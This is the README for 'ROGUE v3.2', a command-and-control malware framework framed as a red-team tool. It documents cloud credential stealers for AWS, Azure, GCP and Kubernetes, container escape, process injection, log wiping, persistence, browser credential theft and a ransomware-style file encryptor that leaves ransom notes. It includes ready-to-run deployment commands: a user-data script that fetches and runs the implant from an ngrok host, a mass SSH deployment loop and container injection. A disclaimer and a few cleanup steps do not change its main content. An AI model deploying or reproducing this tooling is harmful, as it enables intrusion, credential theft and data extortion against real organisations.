ROGUE v3.2 is a comprehensive encrypted command-and-control framework designed for authorized penetration testing, red team operations, and incident response training. Featuring AES-256 encryption, web-based administration, cloud-awareness, and an extensive payload arsenal, ROGUE provides professional-grade capabilities for security testing.
Disclaimer: This tool is provided for educational purposes. Only use on systems you own or have written permission to test on.
- Automatic Cloud Environment Detection - AWS, Azure, GCP, Docker, Kubernetes
- Cloud-Specific Tactics - Environment-adapted persistence and evasion
- Cloud Operations Tab - Dedicated interface for cloud exploitation
- Provider-Specific Payloads - AWS/Azure/GCP credential harvesters
- Container Escape & K8s Exploitation - Advanced container-aware operations
- 20+ Professional Payloads including cloud-specific modules
- 5 New Cloud Payloads for cloud environment exploitation
- Cloud-Aware Persistence - Adapts to AWS/Azure/GCP/Container environments
- Automatic Environment Adaptation - Changes tactics based on detected cloud provider
- Cloud Reconnaissance - Provider-specific intelligence gathering
- Cloud Detector (
cloud_detector.py) - Detect cloud environment and adapt behavior - AWS Credential Stealer (
aws_credential_stealer.py) - Harvest AWS credentials and metadata - Azure Credential Harvester (
azure_cred_harvester.py) - Steal Azure tokens and credentials - Container Escape (
container_escape.py) - Escape containerized environments - Kubernetes Secret Stealer (
k8s_secret_stealer.py) - Harvest K8s secrets and configs
- Cloud Operations Tab - Dedicated cloud exploitation interface
- Cloud Info Display - Real-time cloud environment detection in bot list
- Provider-Specific Operations - AWS, Azure, GCP, Container/Kubernetes
- Cloud Environment Scanner - Integrated cloud reconnaissance tool
- Adaptive Implant Settings - Cloud-aware hidden directories and persistence
- 4 Advanced Payloads for elite stealth and persistence
- File Encryption Payload - AES-256 encryption/decryption (DESTRUCTIVE - use with caution)
- Compound Operations for automated red team workflows
- Tabbed Web Interface with dedicated advanced operations section
- Process Injection & File Hiding for maximum stealth
The implant automatically detects:
- AWS EC2 instances via metadata service (169.254.169.254)
- Azure VMs through Azure instance metadata
- Google Cloud VMs via GCP metadata service
- Docker containers via /.dockerenv and cgroups
- Kubernetes pods via service account mounts
- Generic containers through cgroup analysis
Based on detected environment:
- Hidden Directory Selection - Chooses optimal stealth locations
- Persistence Mechanism Adaptation - Uses cloud-native persistence
- Tactics Selection - Environment-specific exploitation methods
- Payload Pre-fetching - Downloads relevant cloud payloads
- Communication Adaptation - Adjusts beaconing for cloud networks
- Cloud-init user-data modification
- Instance metadata cron jobs
- AWS-specific service creation
- EC2 tag-based persistence
- VM Agent extension installation
- Azure cloud-init configuration
- Custom script extensions
- Azure-specific scheduled tasks
- Google Cloud startup scripts
- GCP cloud-init configuration
- Instance metadata-based triggers
- Custom metadata persistence
- Docker socket exploitation
- Memory-only execution
- Container image modification
- Kubernetes cron jobs
Access via: http://localhost:4444/admin → "Cloud Ops" tab
trigger_cloud_detect # Detect cloud environment
trigger_cloud_recon # Execute cloud reconnaissancetrigger_aws_creds # Steal AWS credentials and metadata
trigger_aws_enum # Enumerate AWS resources
load_payload aws_lateral.py # Load AWS lateral movementtrigger_azure_creds # Steal Azure credentials
trigger_azure_enum # Enumerate Azure resources
load_payload azure_lateral.py # Load Azure lateral movementtrigger_gcp_creds # Steal GCP credentials
trigger_gcp_enum # Enumerate GCP resources
load_payload gcp_lateral.py # Load GCP lateral movementtrigger_container_escape # Attempt container escape
trigger_k8s_creds # Steal Kubernetes credentials
load_payload docker_breakout.py # Load container breakout- Full cloud scan (metadata, credentials, resources)
- Credentials-only scan
- Metadata-only collection
- Implant adaptation to cloud
git clone https://github.com/ekomsSavior/rogue.git
cd rogue# Core dependencies
sudo apt update
sudo apt install python3 python3-pip python3-dev python3-venv -y
# Install Python packages
pip3 install pycryptodome flask requests psutil setproctitle netifaces paramiko pynput --break-system-packages
# Optional for cloud features
pip3 install boto3 azure-identity google-cloud-storage kubernetes --break-system-packages
# For advanced payloads
pip3 install pyautogui python-nmap secretstorage --break-system-packagesNote: If you don't want to use --break-system-packages, make a venv and do it from there:
python3 -m venv rogue_env
source rogue_env/bin/activate
pip3 install pycryptodome flask requests psutil setproctitle netifaces paramiko pynput boto3 azure-identity google-cloud-storage kubernetes pyautogui python-nmap secretstorage# Download and install ngrok
wget https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-amd64.tgz
tar -xvzf ngrok-v3-stable-linux-amd64.tgz
sudo mv ngrok /usr/local/bin/
# Set up authentication
ngrok config add-authtoken YOUR_NGROK_AUTH_TOKENpython3 rogue_c2.pyExpected Output:
============================================================
ROGUE C2 SERVER - Complete Command & Control
============================================================
[+] Exfil listener started on port 9091
[+] Reverse shell listener started on port 9001
[*] Starting ngrok tunnel...
[+] C2 SERVER IS LIVE!
[NGROK] C2 URL: https://your-subdomain.ngrok-free.dev
[NGROK] Hostname: your-subdomain.ngrok-free.dev
[NGROK] Payloads: https://your-subdomain.ngrok-free.dev/payloads/
[ADMIN] Web Panel: http://localhost:4444/admin
[CLOUD] 5 Cloud Payloads Added: Cloud Detector, AWS/Azure/GCP Stealers, Container Escape, K8s Stealer
[ADVANCED] 4 Advanced Payloads: Process Injection, File Hider, Cron Persist, Competitor Cleaner
[FILE ENCRYPTION] System-wide modes: system_test, system_user, system_aggressive, system_destructive
============================================================
Edit rogue_implant.py with your C2 details:
C2_HOST = 'your-ngrok-subdomain.ngrok-free.dev'
C2_PORT = 4444
PAYLOAD_REPO = "https://your-ngrok-subdomain.ngrok-free.dev/payloads/"Manual Deployment:
python3 rogue_implant.pyCloud Deployment Example (AWS):
# Deploy to AWS EC2 via user-data
cat > user-data.sh << 'EOF'
#!/bin/bash
wget https://your-ngrok-subdomain.ngrok-free.dev/payloads/rogue_implant.py -O /tmp/rogue.py
python3 /tmp/rogue.py &
EOF
# Launch EC2 with user-data
aws ec2 run-instances --image-id ami-12345678 --user-data file://user-data.shMass Deployment (SSH):
for ip in $(cat targets.txt); do
scp rogue_implant.py user@$ip:/tmp/ && \
ssh user@$ip "cd /tmp && python3 rogue_implant.py &"
doneContainer Deployment:
# Inject into running container
docker cp rogue_implant.py container_name:/tmp/
docker exec container_name python3 /tmp/rogue_implant.py &
# Or build into container image
echo "CMD python3 /app/rogue_implant.py" >> Dockerfilehttp://localhost:4444/admin
- View connected implants with real-time status
- Cloud Info Display - Shows detected cloud environment
- Send commands to individual bots
- Monitor command results and pending queues
- Color-coded status indicators (green = active, teal = cloud-detected)
- File Encryption Tool - Dedicated interface with warnings
- Advanced Payloads Section - Quick access to new capabilities
Cloud-Aware Operations (NEW):
trigger_cloud_detect # Detect cloud environment
trigger_cloud_recon # Cloud-specific reconnaissance
trigger_aws_creds # AWS credential harvesting
trigger_azure_creds # Azure credential harvesting
trigger_gcp_creds # GCP credential harvesting
trigger_container_escape # Container escape attempt
trigger_k8s_creds # Kubernetes credential harvestingReconnaissance & Intelligence (Enhanced):
trigger_sysrecon # Comprehensive system reconnaissance
trigger_linpeas # Linux privilege escalation checker
trigger_hashdump # Password hash extraction
trigger_browsersteal # Browser credential theft
trigger_network_scan # Network host discoveryAdvanced Operations:
trigger_procinject # Process injection for stealth execution
trigger_filehide # Advanced file hiding techniques
trigger_cronpersist # Advanced cron persistence methods
trigger_compclean # Clean competitor malware/botnetsCompound Operations:
trigger_full_recon # Complete reconnaissance suite
trigger_harvest_all # Comprehensive data collection
trigger_clean_sweep # Forensic cleanup & restartFile Operations (DESTRUCTIVE):
trigger_fileransom encrypt /path [password] # Encrypt files (removes originals)
trigger_fileransom decrypt /path <password> # Decrypt files with passwordPersistence & Stealth:
trigger_stealthinject # PolyRoot persistence installation
trigger_persistence_setup # Additional persistence mechanisms
trigger_defense_evasion # Anti-forensic techniques
trigger_logclean # System log cleaning- Browse available payloads
- Cloud Payloads Section (NEW) - AWS/Azure/GCP/Container/K8s tools
- Direct load/run buttons
- Payload descriptions and categories
- Organized by operation type
- File Encryption marked with orange warnings
- Advanced Payloads marked with purple "NEW" badges
- Cloud Payloads marked with teal "CLOUD" badges
- Process Injection - Inject implant into legitimate processes
- Advanced File Hider - Hide files using advanced techniques
- Advanced Cron Persistence - Sophisticated cron-based persistence
- Competitor Cleaner - Remove other malware/botnets
- Advanced operations console for elite payloads
- Cloud Detection - Environment detection and adaptation
- AWS Operations - AWS-specific credential harvesting and enumeration
- Azure Operations - Azure credential harvesting and resource discovery
- GCP Operations - Google Cloud Platform credential harvesting
- Container Operations - Container escape and Kubernetes exploitation
- Cloud Environment Scanner - Full cloud reconnaissance tool
- Adapt Implant to Cloud - Automatic environment adaptation
- Command execution history
- Timestamped results
- Filter by bot ID
- Export capabilities
- Server uptime
- Ngrok tunnel status
- Active bot count
- System resource monitoring
- Advanced payloads count
- Cloud payloads count
trigger_cloud_detectDetects:
- AWS EC2 instances via metadata service
- Azure VMs through Azure instance metadata
- Google Cloud VMs via GCP metadata
- Docker containers via /.dockerenv
- Kubernetes pods via service accounts
- Generic container environments
Features:
- Automatic environment adaptation
- Cloud-specific tactic selection
- Provider identification with confidence levels
- Metadata collection for intelligence
trigger_aws_credsCollects:
- IAM role credentials from metadata
- AWS CLI configuration files (~/.aws/)
- Environment variables with AWS keys
- EC2 instance metadata
- S3 bucket access keys
Features:
- Automatic credential validation
- Permission enumeration
- Region discovery
- Service access testing
trigger_azure_credsHarvests:
- Managed identity tokens
- Azure CLI credentials
- Service principal configurations
- VM metadata and tags
- Key Vault access patterns
Features:
- Token acquisition and validation
- Subscription enumeration
- Resource group discovery
- Role assignment analysis
trigger_container_escapeTechniques:
- Docker socket exploitation
- Privilege escalation via capabilities
- Mount namespace breakout
- Kernel module loading
- Cgroup manipulation
Features:
- Multiple escape vector attempts
- Success probability assessment
- Post-escape host reconnaissance
- Persistence establishment on host
trigger_k8s_credsSteals:
- Kubernetes service account tokens
- ConfigMaps with sensitive data
- Secrets from all namespaces
- kubeconfig files
- Cluster role bindings
Features:
- Namespace enumeration
- Secret extraction and decryption
- Cluster privilege escalation
- Lateral movement planning
trigger_sysreconCollects:
- System hardware information
- Network configuration
- User accounts and privileges
- Running processes and services
- Installed software inventory
- Security defenses status
trigger_linpeasChecks:
- Sudo privileges and misconfigurations
- SUID/SGID binaries
- World-writable files and directories
- Cron job vulnerabilities
- Kernel exploits
- Linux capabilities
trigger_hashdumpExtracts:
- Linux password hashes (/etc/shadow)
- Windows SAM hashes (if available)
- SSH private/public keys
- Browser saved credentials
- Memory credential artifacts
trigger_procinjectFeatures:
- Inject Rogue implant into legitimate system processes
- Memory-only execution to bypass file scanning
- Target processes: systemd, sshd, nginx, apache
- Persist across reboots via injected processes
- Bypass traditional process monitoring tools
trigger_filehideFeatures:
- Hide files using Linux extended attributes
- Dot-prefix manipulation and hidden directories
- Filesystem tunneling techniques
- Anti-forensics methods to evade detection
- Make files invisible to standard system tools
trigger_cronpersistFeatures:
- Randomized execution times to evade pattern detection
- Obfuscated cron entries that appear legitimate
- Multiple backup persistence methods
- Self-healing capability if removed
- Anti-forensic techniques to hide cron jobs
trigger_compcleanFeatures:
- Detect and remove common malware families
- Clean competitor C2 implants and backdoors
- Remove unauthorized persistence mechanisms
- System sanitization for exclusive control
- Identify and neutralize threat actors on the system
trigger_fileransom encrypt /path [password] # Encrypt files
trigger_fileransom decrypt /path <password> # Decrypt filesFeatures:
- AES-256 military-grade encryption
- Password-protected encryption/decryption
- Auto-generates strong passwords
- Creates ransom note with recovery instructions
- Saves encryption log with password
- WARNING: Removes original files permanently
# From C2 web interface (Cloud Ops tab):
trigger_cloud_detect
# Or directly via command:
send_https_command("trigger_cloud_detect")# Comprehensive cloud reconnaissance
trigger_cloud_recon
# This will:
# 1. Detect cloud provider
# 2. Gather provider-specific metadata
# 3. Collect available credentials
# 4. Enumerate accessible resources# 1. Detect AWS environment
trigger_cloud_detect
# 2. Steal AWS credentials
trigger_aws_creds
# 3. Enumerate AWS resources
trigger_aws_enum
# 4. Attempt lateral movement within AWS
load_payload aws_lateral.py# 1. Detect Azure environment
trigger_cloud_detect
# 2. Harvest Azure credentials
trigger_azure_creds
# 3. Enumerate Azure resources
trigger_azure_enum
# 4. Attempt lateral movement in Azure
load_payload azure_lateral.py# 1. Detect container environment
trigger_cloud_detect
# 2. Attempt container escape
trigger_container_escape
# 3. If successful, deploy to host
trigger_persistence_setup
# 4. Clean container traces
trigger_logclean# 1. Detect Kubernetes environment
trigger_cloud_detect
# 2. Steal Kubernetes secrets
trigger_k8s_creds
# 3. Enumerate cluster resources
# (Manual commands via kubectl if available)
# 4. Attempt lateral movement in cluster
load_payload k8s_lateral.pyThe implant automatically adapts persistence based on detected environment:
In AWS:
- Modifies cloud-init user-data
- Creates EC2 metadata-based cron jobs
- Uses AWS-specific service mechanisms
In Azure:
- Installs VM Agent extensions
- Modifies Azure cloud-init configurations
- Creates Azure-specific scheduled tasks
In GCP:
- Adds Google Cloud startup scripts
- Modifies GCP cloud-init configurations
- Uses instance metadata for triggers
In Containers:
- Uses Docker socket for persistence
- Implements memory-only execution
- Creates container-specific cron jobs
# Force cloud-aware persistence setup
# (Automatic on implant startup when cloud detected)
# Check current persistence status
trigger_status
# Verify cloud adaptation
cat ~/.cache/.rogue/cloud_detection.json 2>/dev/null# AWS metadata
curl http://169.254.169.254/latest/meta-data/ 2>/dev/null
# Azure metadata
curl -H Metadata:true "http://169.254.169.254/metadata/instance?api-version=2021-02-01"
# GCP metadata
curl -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/"# Check for cloud credentials
find / -name ".aws" -o -name ".azure" -o -name ".config/gcloud" 2>/dev/null
# Check environment variables
env | grep -i aws\|azure\|gcp\|cloud
# Check running processes for cloud tools
ps aux | grep -i aws\|az\|gcloud\|kubectl- Use IMDSv2 tokens for metadata access
- Leverage AWS roles instead of stored credentials
- Use VPC endpoints to avoid internet exposure
- Implement request signing for API calls
- Use managed identities instead of service principals
- Leverage Azure Key Vault for secret storage
- Use private endpoints for Azure services
- Implement token caching to reduce authentication frequency
- Use ephemeral containers with no persistence
- Implement memory-only execution
- Leverage sidecar containers for C2
- Use Kubernetes jobs for ephemeral tasks
trigger_full_recon # Includes cloud detection if in cloudWhen in cloud environment, this also:
- Detects cloud provider and type
- Collects cloud metadata
- Gathers available credentials
- Enumerates cloud resources
- Maps network topology within cloud
trigger_harvest_all # Enhanced for cloud environmentsCloud-enhanced collection:
- Cloud credential harvesting (AWS/Azure/GCP)
- Cloud metadata exfiltration
- Container/Kubernetes secret collection
- Cloud storage bucket enumeration
- Database credential extraction
# Use cloud-native services for stealth
trigger_cloud_detect # First, understand environment
# Then apply appropriate stealth:
if AWS:
trigger_procinject # Process injection
trigger_filehide # Advanced file hiding
# Use AWS CloudWatch for log obfuscation
if Container:
trigger_container_escape # Escape to host
trigger_memory_persistence # Memory-only execution
# Use container orchestration for hiding
if Kubernetes:
trigger_k8s_creds # Steal service account
# Use K8s jobs for ephemeral execution
# Leverage K8s network policies for stealth# Cloud-specific log cleaning
trigger_logclean # Enhanced for cloud logs
# Cloud-specific targets:
# AWS: CloudTrail, CloudWatch, VPC Flow Logs
# Azure: Activity Logs, Monitor, Network Watcher
# GCP: Cloud Audit Logs, VPC Flow Logs, Operations# AWS lateral movement
load_payload aws_lateral.py
# This payload can:
# 1. Use stolen credentials to access other instances
# 2. Enumerate security groups for accessible ports
# 3. Attempt SSH/RDP connections to other instances
# 4. Deploy implants via AWS Systems Manager# If credentials allow multiple cloud access
# Manual steps:
# 1. Harvest credentials from current cloud
# 2. Test credentials against other cloud providers
# 3. Deploy implants to accessible clouds
# 4. Establish cross-cloud C2 channels# Remove from AWS instance
sudo pkill -9 -f rogue
sudo rm -rf ~/.cache/.rogue
sudo rm -rf /var/lib/cloud/.cache
# Clean cloud-init modifications
sudo sed -i '/ROGUE\|rogue_agent/d' /etc/cloud/cloud.cfg
# Remove AWS cron jobs
sudo rm -f /etc/cron.d/aws-monitor# Remove from Azure VM
sudo pkill -9 -f rogue
sudo rm -rf ~/.cache/.rogue
sudo rm -rf /var/lib/waagent/custom-script
# Clean Azure extensions
sudo find /var/lib/waagent -name "*rogue*" -delete# Remove from container
pkill -9 -f rogue
rm -rf /.cache/.rogue
# Check for host escape
ps aux | grep -E "docker|containerd|kube" | grep -v grep
# If escaped to host, clean host as well# Remove from Kubernetes pod
pkill -9 -f rogue
rm -rf /.cache/.rogue
# Check for cluster-wide deployment
kubectl get jobs,cronjobs,deployments -A | grep -i rogue
# Remove any Rogue-related resources
kubectl delete -f rogue-manifest.yaml 2>/dev/null# Check for cloud-specific IoCs
# AWS: Unusual IAM role usage, unexpected metadata queries
# Azure: Unusual managed identity usage, unexpected extension installs
# GCP: Unusual service account usage, unexpected metadata access
# Containers: Container escape attempts, unusual host mounts# Check cloud provider logs
# AWS CloudTrail, CloudWatch
# Azure Activity Logs, Monitor
# GCP Cloud Audit Logs, Operations
# Container: Docker/Container logs
# Kubernetes: K8s audit logs# Test cloud detection manually
python3 -c "
import urllib.request
import socket
socket.setdefaulttimeout(2)
try:
req = urllib.request.Request('http://169.254.169.254/latest/meta-data/')
urllib.request.urlopen(req)
print('AWS detected')
except:
print('Not AWS or metadata blocked')
"
# Check for metadata service access
curl -s http://169.254.169.254/latest/meta-data/ 2>/dev/null || echo "AWS metadata unavailable"
curl -H Metadata:true 'http://169.254.169.254/metadata/instance?api-version=2021-02-01' 2>/dev/null || echo "Azure metadata unavailable"
curl -H 'Metadata-Flavor: Google' 'http://metadata.google.internal/computeMetadata/v1/' 2>/dev/null || echo "GCP metadata unavailable"# Check for cloud credentials
ls -la ~/.aws/ ~/.azure/ ~/.config/gcloud/ 2>/dev/null
# Test AWS credentials
aws sts get-caller-identity 2>/dev/null || echo "AWS credentials not configured"
# Test Azure credentials
az account show 2>/dev/null || echo "Azure credentials not configured"
# Test GCP credentials
gcloud config list 2>/dev/null || echo "GCP credentials not configured"# Check container environment
cat /.dockerenv 2>/dev/null && echo "Running in Docker"
cat /proc/1/cgroup | grep -i docker && echo "Docker container detected"
ls /var/run/secrets/kubernetes.io/serviceaccount 2>/dev/null && echo "Kubernetes pod detected"
# Check for escape vectors
ls -la /var/run/docker.sock 2>/dev/null && echo "Docker socket accessible"
find / -perm -4000 2>/dev/null | head -10# Check Kubernetes environment
env | grep -i kubernetes
ls /var/run/secrets/kubernetes.io/serviceaccount 2>/dev/null
# Test Kubernetes access
kubectl get pods 2>/dev/null || echo "kubectl not available or no permissions"
curl -s -k -H "Authorization: Bearer $(cat /var/run/secrets/kubernetes.io/serviceaccount/token)" https://kubernetes.default.svc/api/v1/namespaces/default/pods 2>/dev/null | head -5# Check ngrok status
curl http://localhost:4040/api/tunnels
# Restart ngrok
pkill ngrok
ngrok http 4444
sleep 5# Test C2 connectivity from target
curl -k https://your-c2.ngrok-free.dev
# Check implant logs
cat ~/.cache/.rogue/.implant.log 2>/dev/null
# Verify cloud detection worked
cat ~/.cache/.rogue/cloud_detection.json 2>/dev/null# Cloud Detection & Recon
trigger_cloud_detect # Detect cloud environment
trigger_cloud_recon # Cloud-specific reconnaissance
trigger_cloud_scan full # Full cloud environment scan
# AWS Operations
trigger_aws_creds # Steal AWS credentials
trigger_aws_enum # Enumerate AWS resources
# Azure Operations
trigger_azure_creds # Steal Azure credentials
trigger_azure_enum # Enumerate Azure resources
# GCP Operations
trigger_gcp_creds # Steal GCP credentials
trigger_gcp_enum # Enumerate GCP resources
# Container Operations
trigger_container_escape # Container escape attempt
trigger_k8s_creds # Kubernetes credential harvesting# System Information
whoami
uname -a
ip a
ps aux
# Cloud Information
env | grep -i cloud
curl -s http://169.254.169.254/latest/meta-data/ 2>/dev/null | head -5# Reconnaissance
trigger_sysrecon
trigger_linpeas
trigger_hashdump
trigger_browsersteal
# Advanced Payloads
trigger_procinject
trigger_filehide
trigger_cronpersist
trigger_compclean
# Cloud Operations
trigger_cloud_detect
trigger_aws_creds
trigger_azure_creds
trigger_container_escape
# File Operations (DESTRUCTIVE)
trigger_fileransom encrypt /path [password]
trigger_fileransom decrypt /path <password>
# Operations
trigger_full_recon
trigger_harvest_all
trigger_clean_sweep
# Management
trigger_status
trigger_self_update
trigger_help# Load and execute
load_payload sysrecon.py
run_payload sysrecon.py
# Cloud payloads
load_payload cloud_detector.py
run_payload cloud_detector.py
# Advanced payloads
load_payload process_inject.py
run_payload process_inject.py
# File Encryption (use with extreme caution)
load_payload fileransom.py
run_payload fileransom.pyTHE FILE ENCRYPTION PAYLOAD (fileransom.py) IS DESTRUCTIVE SOFTWARE.
It PERMANENTLY REMOVES ORIGINAL FILES during encryption.
Files are only recoverable with the correct password.
THE CLOUD EXPLOITATION FEATURES ARE FOR AUTHORIZED TESTING ONLY.
Unauthorized access to cloud resources is illegal and unethical.
THIS SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND.
The author assumes NO LIABILITY for data loss, misuse, or damage caused by this software.
Users must:
1. Obtain proper authorization before use
2. Only use in isolated test environments
3. Maintain backups of all important data
4. Assume full responsibility for encryption password management
5. Only test cloud environments you own or have written permission to test
6. Comply with all cloud provider terms of service
Last Updated: v3.2 | For authorized security testing only
CLOUD EXPLOITATION: Use only on cloud environments you own or have explicit permission to test
FILE ENCRYPTION: Use with extreme caution in isolated environments only
